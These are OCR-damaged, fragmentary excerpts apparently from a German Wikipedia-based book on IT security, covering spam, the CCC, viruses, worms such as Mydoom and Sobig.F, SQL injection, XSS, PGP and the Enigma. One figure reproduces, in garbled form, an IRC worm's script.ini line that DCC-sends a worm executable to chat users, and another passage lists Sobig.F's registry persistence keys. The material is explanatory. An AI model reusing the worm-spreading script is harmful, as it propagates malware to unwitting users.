NAME Permission is granted to copy distribute and or modify this document under the terms of the GNU Free Documentation License Version 1 2 or any later version published
526. ung von E Mail kann ein E Mail Programm auch E Mail Client oder Mail User Agent MUA genannt verwendet werden Ein solches Programm ist meist auf dem Rechner des Benutzers installiert und kommuniziert mit einem oder mehreren Mail Servern ei nes Mail Providers Webmail Als alternatives Verfahren zur Verwendung eines E Mail Pro gramms hat sich auch die Nutzung von Webmail etabliert Webmail er m glicht die Nutzung von E Mail mithilfe eines Web Browsers ber ein Web Interface Bei der Benutzung einer Webmail Oberfl che werden die E Mails nicht auf dem eigenen PC bearbeitet sondern auf einem Web Server eines Mail Providers Vor und Nachteile Authentizit t und Schutz des Inhaltes Die meisten E Mail Nach richten werden im Klartext verschickt k nnen also prinzipiell auf jedem Rechner den die Nachricht auf ihrem Weg vom Absender zum Empf nger 185 Sonstige Themen passiert gelesen werden Zieht man eine Analogie zur Briefpost ist eine E Mail daher eher mit einer Postkarte vergleichbar als mit einem durch einen Umschlag vor neugierigen Blicken gesch tzten Brief Ebenfalls hnlich wie bei einem Brief oder einer Postkarte und ge nauso einfach lassen sich E Mails mit einer falschen Absenderadresse verschicken was zum Beispiel bei Spam UCE UBE oft zu beobachten ist Empfangsadresse CC und BCC Adressen lassen sich gleicherma en f lschen address spoofing Die L sung f r diese beiden Probleme ist Verschl sselung u
527. us den Newsgroups und Webseiten extrahiert werden kann die Erw hnung einer E Mail Adresse auf Webseiten und im Text von Usenet Artikeln auch so manipuliert werden dass sie nur von Menschen aber nicht von Maschinen verstanden wird Beispielsweise wird statt Paul example org die Adresse PaulXYZ example org ent ferne XYZ angegeben Das Robot Programm erkennt die Manipulation nicht die E Mail Adresse Paul example org bleibt UBE frei 195 Sonstige Themen Im Header von Usenet Artikeln d h in den Einstellungen des Newsrea ders verst t diese Ma nahme gegen RFC 1036 und RFC 2822 F lschungen im Domainteil einer E Mailadresse also hinter dem Zeichen sind auch m glich Um absichtlich und f r Postmaster leichter zu erkennen eine ung ltige Adresse zu verwenden wurde die Top Level Domain TLD invalid erfunden Ob sie sich durchsetzen wird und ob die Harvester sich anpassen werden steht noch aus Allerdings wird berechtigt die Ansicht vertreten das Verf lschen von E Mail Adressen bek mpfe nicht die Ursachen von Spam sondern treffe lediglich unbeteiligte Dritte Fehlermeldungsmails belasten diejenigen deren Adresse als Absender verwendet wurde Das SMTP erm glicht ein faches F lschen der Absenderadresse weshalb UBE h ufig unter falschem Namen versandt wird Die Bounces erzeugen zudem unn tigen Daten verkehr im Netz Das Verwenden verf lschter Adressen ist damit inak zeptabel Die h ufig empfohlene Kod
528. usatzes zum Datenklo ein selbst gebautes postalisch nicht zugelassenes Modem Schlie lich wollte die weltweite Kommunkation gef rdert werden auch wenn dabei gegen unsinnige Regeln der Bundespost verstossen wurde BTX Hack ffentliche Bekanntheit erlangte der CCC am 19 November 1984 mit dem so genannten BTX oder Haspa Hack Hierbei wurden auf grund eines Daten berlaufs im von der Bundespost als sicher titulierten BTX System in einer Nacht knapp 135 000 DM der Hamburger Sparkasse auf das Konto des Vereins bertragen Voraus ging eine Demonstration der Sicherheitsl cke durch Wau Holland bei der 8 DAFTA doch wur de das Problem bei der Post nicht behoben Insbesondere die Aussagen Wir sind ersch ttert Die Post hat versichert dass BTX sicher ist das war falsch und Alle Hochachtung vor der T chtigkeit dieser Leute Es ist bedauerlich dass erst durch den Beweis den diese Leute erbracht haben die Post davon berzeugt werden konnte dass ihre BTX Software noch nicht allen Anforderungen gerecht wird des Haspa Vorstands Benno Sch ler mann befreiten den CCC von dem Ruf kriminell zu sein 159 Sonstige Themen Im Gegenteil der CCC wurde in den kommenden Jahren bei der Schaf fung des Datenschutzgesetzes in der BRD konsultiert Auch Gutachten wurden auf h chst politischer Ebene ausgestellt Nach dem BTX Hack wurde der Ruf nach einer Veranstaltung auf der man sich den bekannten und noch kommenden Hacks widmet immer l
529. usik Meldungsboxen oder pl tzlich auftauchende Texte auf dem Bildschirm mit oft f r den Virusautor am santen Nachrichten oder gar politi schem Inhalt Manipulation des Bildschirminhaltes wie herunterfallende Buchsta ben Verzerrungen oder ber den Bildschirm wandernde Objekte Die meisten dieser Existenzmeldungen sind harmlos und erfolgen oft nur zu bestimmten Uhrzeiten oder nur an bestimmten Tagen um nicht zu schnell aufzufallen und so eine h here Verbreitung zu erlangen 36 Computervirus Datenzerst rung Durch das Infizieren von Dateien werden die darin enthaltenen Daten manipuliert und m glicherweise zerst rt Da jedoch die meisten Viren vor Entdeckung gesch tzt werden sollen ist eine Rekon struktion der Daten in vielen F llen m glich Einige wenige Viren wurden speziell zur Zerst rung von Daten ge schrieben Das kann vom L schen von einzelnen Dateien bis hin zum For matieren ganzer Festplatten f hren Diese Art von Payload wird von den meisten Menschen unmittelbar mit allen Viren in Verbindung gebracht Da der Speicher der Lebensraum von Viren ist zerst ren sie sich mit diesen Aktionen oft selbst Hardwarezerst rung Direkte Hardwarezerst rung durch Software und somit durch Computerviren ist nur in Einzelf llen m glich Dazu m sste dem Virenautor bekannt sein wie eine bestimmte Hardware so extrem oder fehlerhaft angesteuert werden kann dass es zu einer Zerst rung kommt Einige z T eher theoretis
530. usreichenden Schutz ben tigt werden Spieltheorie In der Spieltheorie bezeichnet man mit der Brute Force Methode eine Strategie in der der Variantenbaum bis zu einer gewissen Tiefe vollst ndig analysiert wird Eine Bewertungsfunktion f r jede der dabei auftretenden Stellungen dient dabei zur Entscheidungsfindung f r den besten Zug Der Aufwand f r die Brute Force Methode w chst exponentiell mit der verwendeten Maximaltiefe damit setzt die Hardware dieser Methode eine nat rliche Grenze Die Brute Force Methode kann mit den verschiedensten Methoden verfeinert werden was durch das genannte exponentielle Wachstum zu erheblichen Verbesserungen f hren kann Eine sehr bliche Verbesserung ist die Alpha Beta Suche Ist ein Zug in einer bestimmten Tiefe durch ei nen gewissen Gegenzug widerlegt dann ist es nutzlos nach noch besseren Widerlegungen zu suchen Eine andere bliche Methode ist ab einer gewissen Tiefe nur noch for cierende Z ge zu betrachten Im Schach w ren dies etwa Schachgebote oder Schlagz ge Kryptoanalyse Bei einer Brute Force Attacke in der Kryptoanalyse werden alle m g lichen Schl ssel nacheinander durchprobiert Deshalb spricht man auch von vollst ndiger Schl sselsuche Die Reihenfolge wird gegebenenfalls nach der Wahrscheinlichkeit ausgew hlt dies ist aber bei blicherweise pseudo zuf llig generierten Schl sseln wenig hilfreich Die Schl ssel l nge spielt ebenfalls eine Rolle da im Schnitt
531. uter installiert und ausgef hrt Nun sendet der Wurm auch von diesem Computer den Link an alle eingetrage nen Kontakte weiter Es w re technisch m glich dass sich der Wurm allen eingetragenen Kontakten zum Download anbietet doch Dank fehlender Dokumentationen der Programme ist so ein Wurm noch nicht aufgetreten IRC W rmer IRC Clients sind Programme mit denen jeder beliebige Benutzer mit anderen Benutzern virtuell in Echtzeit Textnachrichten im Internet Relay Chat austauschen kann Die meisten IRC Programme be nutzen um sich am IRC Server anmelden zu k nnen ein spezielles Script das beim Starten des Programms ausgef hrt wird Dieses Script beinhal tet Befehle die das IRC Programm ausf hrt Diese Befehle sind zum Bei spiel das Einloggen in einen Channel das Schreiben von Meldungen aber auch das Versenden von Dateien Ein IRC Wurm der einen Computer 53 Viren W rmer Trojaner script infiziert hat sucht nach nd on 1 join nt IRC Programmen die er n2 if nickt me f n3 benutzen kann um sich n4 fdec send nick C Programme mIRC32 pr6n exe A n n5 weiterzuverbreiten Wenn n K er ein solches Programm Abb 5 Eine durch einen IRC Wurm modifizierte script ini gefunden hat modifiziert Datei des Programms mIRC er das Script welches au tomatisch geladen wird Beim n chsten Start des IRC Programms wird der Wurm selbstst ndig an alle Benutzer in einem Chatraum verschickt Wenn ein Benutzer den
532. utschland zwingend die gesonderte Rufnummerngasse 0900 9 eingef hrt Dialer die sich ber andere als diese Nummerngasse einw hlen k nnen nicht wie vor geschrieben bei der Bundesnetzagentur registriert werden und sind damit illegal Mit hnlichen Tricks wie Viren und W rmer werden die Programme vorwiegend auf PCs mit dem Betriebssystem Windows installiert Danach baut diese Software oft ohne das Wissen des Benutzers neue kosten pflichtige Verbindungen zu teuren Mehrwertdienste Nummern auf Da das Wissen zu Datensicherheit und Datenschutz bei den meisten In ternetnutzern sehr wenig verbreitet ist haben Betr ger im Netz oft ein leichtes Spiel Ein Anfang 2003 aufgetauchtes Visual Basic Script installierte zum Beispiel ein Trojanisches Pferd welches Werte in der Windows Regis try und in den Sicherheitseinstellungen des Internet Explorers ver n derte damit ActiveX Steuerelemente ohne Warnung aus dem Internet geladen werden k nnen Durch den Aufruf einer solchen Seite oder per E Mail wurde ein teurer Dialer aus dem Internet heruntergeladen Das Script schaltete auch den Modemlautsprecher ab und unterdr ckte die Meldungen w hrend des Aufbaus einer DF Verbindung Davon waren besonders Benutzer der Programme Outlook Outlook Express und des Internet Explorers betroffen wenn die Ausf hrung von ActiveX Objekten oder JavaScript in den Sicherheitseinstellungen erlaubt und die neuesten Sicherheitspatches von Microsoft nicht e
533. value statementhandle gt execute spalte2Wert MS SQL Uber parametrisiertes Kommando kann die Datenbank vor SQL Code Injection gesch tzt werden SELECT COUNT FROM Users WHERE UserName AND UserPass word Quelle http de wikipedia org wiki SQL Injektion Historie 6 7 04 Angelegt von LuckyStarr danach bearbeitet von den Hauptautoren LuckyStarr Interactive Shurakai Volty Hendrik Brummermann J Schmitt Steven Malkovich Sechmet Flominator Achim Raschka Atamari Raymond Udm D Odigo YurikBot Jacks grinsende Rache anonym 12 1 06 1 2 06 WikiPress Redaktion 221 Angriffe Cross Site Scripting Cross Site Scripting XSS bezeichnet das Ausnutzen einer Computersi cherheitsl cke indem Informationen aus einem Kontext in dem sie nicht vertrauensw rdig sind in einen anderen Kontext eingef gt werden in dem sie als vertrauensw rdig eingestuft sind Aus diesem vertrauensw r digen Kontext kann dann ein Angriff gestartet werden Die Bezeichnung Cross Site leitet sich von der Art ab wie diese At tacke webseiten bergreifend ausgef hrt wird auf einer vom Angreifer kontrollierten Seite steht beispielsweise ein pr parierter Hyperlink der zur vermeintlich vertrauensw rdigen Website einer meist ahnungslosen dritten Partei f hrt Cross Site Scripting wird manchmal auch CSS abgek rzt hat jedoch nichts mit der Cascading Style Sheet Technologie zu tun die weit h ufi ger CSS genannt wird Funktio
534. verwirklichen die Idee der Zugriffskontrolle digitaler In halte mit Hilfe von kryptografischen Verfahren Realisiert wird dies indem ein beliebiger digitaler Inhalt durch Verschl sselung eindeutig an eine Lizenz gebunden wird Ohne die zum digitalen Inhalt geh rige g lti ge Lizenz kann der Benutzer zwar das Ger t oder den Datentr ger erwer ben nicht jedoch auf den Inhalt zugreifen 129 Software DRM Paket Digitale Inhalte Verpacker Inhalteserver DRM Stpuerung Verschl sselung Schl ssel Lizenzgenerator Lizenz Schl ssel Lizenzserver Clientanwendung Abb 11 Architektur eines DRMS Der Inhalteserver verwaltet die zu sch tzenden digitalen Inhalte und ver schl sselt diese mit Hilfe des DRM Verpackers zur Verwendung in einem DRMS wodurch die Inhalte vorerst unlesbar werden Der Lizenzserver erzeugt auf Anforderung die erforderlichen Lizenzen zusammen mit den zugeh rigen Schl sseln f r die Benutzerauthentifizierung und Inhalteent schl sselung welche aus den entsprechenden Kennungen Benutzer oder Ger tkennung Inhaltekennung und den Beschreibungen der Rechte berechnet werden M chte der Benutzer auf einen per DRM gesch tzten Inhalt zugreifen fordert die DRM Steuerung vom Lizenzserver die zur Wiedergabe notwendige Lizenz an Werden Authentizit t und Integrit t des Wiedergabeprogramms verifiziert werden die Inhalte mit dem in der Lizenz enthaltenen Schl ssel entschl sselt auf diese Weise wieder lesbar
535. vor allem der Image Schaden der betroffenen Unternehmen heute ist dieser immaterielle Schaden nicht mehr so hoch da ein Computervirus schon eher als norma le und bliche Gefahr akzeptiert wird Aufbau Computerviren haben viele unterschiedliche Formen daher ist es nur schwer m glich zu beschreiben wie ein Virus grunds tzlich aufgebaut ist Die folgende Erkl rung ist keineswegs ein Standard f r alle Viren Man che Viren k nnen mehr Funktionen haben andere wiederum weniger Entschl sselungsroutine Dieser Teil sorgt bei verschl sselten Viren daf r dass die verschl sselten Daten wieder zur Ausf hrung gebracht werden k nnen Nicht alle Viren besitzen diesen Teil da nicht alle ver schl sselt sind Oft wird die Entschl sslungsroutine der Viren von An tiviren Herstellern dazu ben tzt das Virus zu identifizieren da dieser Teil oft klarer erkennbar ist als der Rest des Virus Vermehrungsteil Dieser Programmteil sorgt f r die Vermehrung des Virus Es ist der einzige Teil den jedes Virus hat Definition 38 Computervirus Erkennungsteil Im Erkennungsteil wird gepr ft ob die Infektion eines Programms oder Systembereichs bereits erfolgt ist Jedes Wirts programm wird nur einmal infiziert Dieser Teil ist in fast allen nicht berschreibenden Computerviren vorhanden Schadensteil Im Verh ltnis zur Zahl der Computerviren haben nur sehr wenige einen Schadensteil Payload Der Schadensteil ist der Grund f r die Angs
536. war im Jahre 2003 bereits des fteren Ziel verschie dener verteilter Denial of Service Attacken ohne dass Computerviren daf r verantwortlich waren 27 Januar 2004 Die SCO Group bietet 250 000 US Dollar Belohnung f r Informationen die zur Ergreifung des Wurm Programmierers f hren In den Vereinigten Staaten werden vom FBI und Secret Service Ermittlungen aufgenommen 28 Januar 2004 Eine zweite Version des Wurms wird entdeckt Die erste E Mail mit der neuen Variante Mydoom B trifft gegen 14 00 Uhr UTC wiederum aus Russland ein Die neue Version soll ab dem 3 Februar 2004 auch Microsoft attackieren Mydoom B blockiert auch den Zugriff auf die Webseiten von ber 60 Antiviren Herstellern sowie auf so genannte Popup Werbefenster von Online Marketingfirmen wie DoubleClick Sicherheitsexperten berichten dass nunmehr fast jede f nfte eintreffende E Mail virenverseucht ist 29 Januar 2004 Aufgrund von Fehlern im Programmcode des My doom B Wurms nimmt die Ausbreitungsgeschwindigkeit entgegen anders lautender Voraussagen ab Microsoft setzt ebenfalls 250 000 US Dollar Belohnung f r Informationen zur Ergreifung des Program mierers aus 30 Januar 2004 Eine franz sische Variante des Wurms kursiert im Internet Die Ursprungsmail wird nach Kanada zur ckverfolgt 1 Februar 2004 Die erste verteilte Denial of Service Attacke gegen die SCO Group beginnt Die Server www sco com und www sco de sind bereits ab dem 31 Januar 2004 17 00 Uhr UTC nich
537. wei Arten durch Einrichtung einer so genannten Backdoor engl f r Hinter t r die es erlaubt den befallenen PC aus der Ferne zu bedienen ge schieht durch Ablage der Mydoom eigenen SHIMGAPI DLL Datei im system32 Verzeichnis und anschlie endem Aufruf als Unterprozess des Windows Explorers durch Vorbereitung einer so genannten Denial of Service Attacke gegen die Webseite der SCO Group welche mit dem 1 Februar 2004 beginnt von einigen Virus Analysten wurden jedoch Zweifel an der korrekten Arbeitsweise der hierzu vorhandenen Funktionen erhoben Eine zweite Version des Wurms Mydoom B adressiert auch die Micro soft Webseite und blockiert den Zugriff auf die Webseiten von Microsoft sowie bekannten Herstellern von AntiViren Programmen Dadurch sol len die AntiViren Programme daran gehindert werden Viren Updates sowie Programm Updates herunterzuladen Erste Analysen lie en vermuten dass Mydoom eine Variante des Mi mail Wurms sei Es wurde vermutet dass die gleichen Personen f r die beiden W rmer verantwortlich sind Die Schlussfolgerungen nachfolgen der Analysen entkr fteten diese Vermutungen jedoch wieder Der Wurm beinhaltet die Nachricht andy Pm just doing my job nothing personal sorry was zu Spekulationen dar ber f hrte ob der Programmierer f r die Erstellung des Wurms bezahlt wurde Andere Spe kulationen insbesondere der SCO Group gingen in die Richtung dass der Wurm aus der Linux Open Source Szene stamm
538. ws ab Version NT bieten von Hause aus Sicher heitsmechanismen welche eine Infektion deutlich erschweren bzw un m glich machen k nnen Trotzdem arbeiten beispielsweise viele Win dows Nutzer stets mit Administratorrechten In diesem Betriebszustand sind viele Sicherheitsschranken des Betriebssystems au er Kraft Ein versehentlich oder automatisch gestartetes Wurmprogramm das gleiche gilt f r Viren kann sich ungehindert die Kontrolle ber viele System funktionen aneignen Sinnvoller ist es sich zwei Benutzerkonten einzu richten eines f r die routinem ige Arbeit mit stark eingeschr nkten Benutzerrechten insbesondere eingeschr nkten Rechten zur Softwarein stallation das andere mit Administratorrechten allein f r Installations und Konfigurationsarbeiten Leider funktionieren diverse Programme unter Windows nicht oder nur unzuverl ssig mit eingeschr nkten Be nutzerrechten F r alle Betriebssysteme gilt aber dass das Arbeiten mit eingeschr nkten Benutzerrechten Computerw rmer nicht in jedem Fall verhindert Grund daf r ist dass jeder Benutzer zum Beispiel E Mails verschicken kann Wirtschaftlicher Schaden Der finanzielle Schaden den Computerw rmer anrichten k nnen ist viel h her als jener bei Computerviren Grund daf r ist der enorme Verbrauch 58 Computerwurm an Netzwerkressourcen Dieser Verbrauch kann zu einem Ausfall von Ser vern wegen berlastung f hren Wenn ein Server ausf llt f hrt das in Be tr
539. wsgroups alt sex und in den erotischen Bilder Newsgroups alt bina ries pictures erotica eskalierte und nahm gewaltige Ausma e an Bis zu 190 Spam ber eine Million Spam Artikel pro Tag wurden eingestellt W hrenddes sen entwickelte sich eine Truppe freiwilliger Aktivisten die mit immer ausgefeilteren und effizienteren Programmen so genannte Cancelbots den Spam wieder cancelten In die Geschichte des Usenet eingegangen sind beispielsweise die Spam Canceller Robert Braver Lysander Spooner Pseudonym Cosmo Roadkill Pseudonym Chris Lewis und Andrew Gierth Letzterer ver ffentlichte in der Newsgroup news admin net abuse announce t glich quasi als Siegertreppchen eine Rangordnung derjenigen die am Vortag den meisten Spam gecancelt hatten wobei die ersten in dieser Liste eine Gr enordnung von mehreren Tausend erreichten Diese Aktivisten sprachen sich untereinander mit einer Mailing Liste ab Sie de monstrierten zwischendurch durch einen Streik wie das Usenet ohne ihre freiwillige Arbeit aussehen w rde Spambek mpfung im Usenet Das unmittelbarste und wirksamste Instrument ist das Canceln Damit veranlasst man alle entsprechend konfigurierten Newsserver den Spam zu l schen Diese Ma nahme greift um so erfolgreicher je schneller sie auf Spam reagiert weil sie nur denjenigen zugute kommt die den Spam noch nicht mit dem Newsreader vom Newsserver heruntergeladen ha ben Das Canceln von Spam erfordert die sorgf ltige Ein
540. y Trust der signierenden Schl ssel wie folgt berechnet sei x die Anzahl von Signaturen deren Signatory Trust marginal ist sei X die Anzahl von Signaturen mit einem Signatory Trust marginal die erforderlich ist damit ein Schliissel als authentisch eingestuft wird sei y die Anzahl von Signaturen deren Signatory Trust complete ist sei Ydie Anzahl von Signaturen mit einem Signatory Trust complete die erforderlich ist damit ein Schl ssel als authentisch eingestuft wird Dann sei A Y Ist L 0 so gilt der berpr fte Schl ssel als nicht authentisch Bei 0 lt L lt 1 wird er als teilweise authentisch angesehen und bei L21 als vollkom men authentisch In Regelfall w hlt man X 2 und Y 1 es sind also zwei Signaturen von teilweise vertrauensw rdigen Personen oder eine Signatur einer voll vertrauensw rdigen Person erforderlich damit ein Schl ssel als authentisch eingestuft wird Prinzipiell kann aber jeder die Werte f r X und Yje nach pers nlichem Paranoia Grad frei w hlen Bewertung Das Web of Trust erm glicht seinen Teilnehmern einerseits die indivi duelle Kontrolle dar ber wen sie als vertrauensw rdig einstufen Zudem gibt es kostenlose Software zur Realisierung des Konzepts des Web of Trust Auf der anderen Seite erfordert es aber einen hohen Grad an Vor wissen vom Benutzer es ist nicht juristisch bindend wie z B eine quali 139 PGP und Zertfikate fizierte elektronische Signatur und d
541. z dann gelangt der Strom direkt zum Mit O gesteckert Kontakt A der Eintrittswalze Der Strom wird ber die Eintrittswalze zum Eingangskontakt A der rechten Walze geleitet Deren streng geheime Verdrahtung bewirkt eine Vertauschung Permutation des Buchstabens Der Strom der am Ein gangskontakt A von rechts eintritt verl sst die Walze auf deren linken Seite beispielsweise am Ausgangskontakt B So wird durch die rechte Wal ze A in B umgewandelt Der Strom gelangt nun ber den Kontakt B in die mittlere Walze und wird durch deren Verdrahtung wiederum permutiert Durchaus m glich ist auch dass bei einer Walze ein Eingangskontakt mit dem gleichnamigen 298 Enigma Ausgangskontakt verbunden ist Dann beibt es bei B Der Strom verl sst hier ber den Kontakt B die mittlere Walze und tritt in die linke Walze ein Deren Verdrahtung sorgt daf r dass der Strom vom Einganskontakt B wie hier zum Ausgangskontakt D geleitet wird Der Strom hat nun alle drei drehbaren Walzen einmal durchlaufen und die Umkehrwalze erreicht Sie hat nur Kontakte auf der rechten Seite und verbindet die Buchstaben paarweise beispielsweise D mit E Nun flie t der Strom ein zweites Mal durch den Walzensatz jetzt aber von links nach rechts Durch die Umkehrwalze gelangt er ber den Kon takt E in die linke Walze Hier ist beispielsweise E mit C verdrahtet Folg lich flie t der Strom weiter ber Kontakt C in die mittlere Walze verl sst sie wieder
542. zeichnis ab Folgende Eintr ge in der Registry werden durchgef hrt HKEY _ LOCAL _ MACHINE SOFTWARE Microsoft Windows CurrentVersion Run TrayX C WINNT WINPPR32 EXE sinc HKEY _ CURRENT _ USER SOFTWARE Microsoft Windows CurrentVersion Run TrayX C WINNT WINPPR32 EXE sinc 64 Mydoom Der Wurm ist darauf programmiert bis zum 10 September 2003 jeden Freitag und Sonntag Kontakt zu bestimmten Rechnern aufzunehmen um von dort wie es scheint weitere Instruktionen zu erhalten Dabei wird ein UDP Paket an Port 8998 eines Remote Servers gesandt Diese ange zielten Rechner wurden aufgrund der ermittelten IP Adressen inzwischen bereits vom Netz genommen Aufgrund der seit dem Verfallsdatum praktisch nicht mehr auftretenden Neuinfektionen mit Sobig F wurde der Wurm beispielsweise von Symantec aus der Gefahrenstufe 4 in die Kate gorie 2 verschoben Von Sobig F betroffen sind potenziell alle Microsoft Betriebssystem versionen von Windows 95 bis Windows XP Quelle http de wikipedia org wiki Sobig F Historie 24 8 03 Angelegt von Josef Spindelb ck danach bearbeitet von den Hauptautoren Josef Spindelb ck Stf Steven Malkovich Flups 12 1 06 1 2 06 WikiPress Redaktion Mydoom Mydoom auch bekannt als Novarg Mimail R und Shimgapi ist ein Com puterwurm Er bef llt Microsoft Windows Systeme und wurde das ers te Mal am 26 Januar 2004 gesichtet Es handelt sich um den b
543. zu n chst einmal lediglich um das Editieren einer URL wodurch im weiteren Verlauf Zugriff auf gesch tzte Daten in der OBSOC Datenbank m glich wurde Logos Im CCC und Umfeld sind drei Logos anzutreffen Der Chaosknoten oder Datenknoten als offizielles Logo des CCC e V er ist ein spiegelbildlich dargestelltes Logo des Bundespost Kabel TV mit verl ngertem und verknotetem Kabelausgang Das Pesth rnchen als Logo der Community urspr nglich von Rein hard Schrutzki 1990 f r den FoeBuD entworfen stellt es ein zum To tenkopf mutiertes altes Bundespost Logo noch mit Telekommunika tionsblitzen dar Die Rakete Fairydust als Logo von CCC Veranstaltungen schon zum 1 Chaos Communication Camp 1999 wurde die kleine bauchige und dreifu ige Rakete als Logo verwendet erhielt jedoch erst zum 2 Camp 2003 ihren Namen und wird inzwischen nicht nur als f nf Meter gro er Nachbau beim Chaos Communication Congress und anderen Ver anstaltungen angetroffen 162 Web Bug Literatur Kulla Daniel Der Phrasenpr fer Szenen aus dem Leben von Wau Hol land Mitbegr nder des Chaos Computer Clubs L hrbach 2003 ISBN 3 922708 25 0 Wunderlich div Autoren Das Chaos Computer Buch Hacking made in Germany Rowohlt Verlag GmbH 1988 ISBN 3 8052 0474 4 Wunderlich div Autoren Hacker f r Moskau Deutsche Computer Spione im Dienst des KGB Rowohlt Verlag GmbH 1989 ISBN 3 8052 0490 6 Weblinks Website des CCC
Download Pdf Manuals
Related Search
Related Contents
取扱説明書 ご使用前に必ず、ご確認ください Manuel de l`utilisateur NIBE FIGHTER 1250 Manuel - Cheminées & Feux Copyright © All rights reserved.
Failed to retrieve file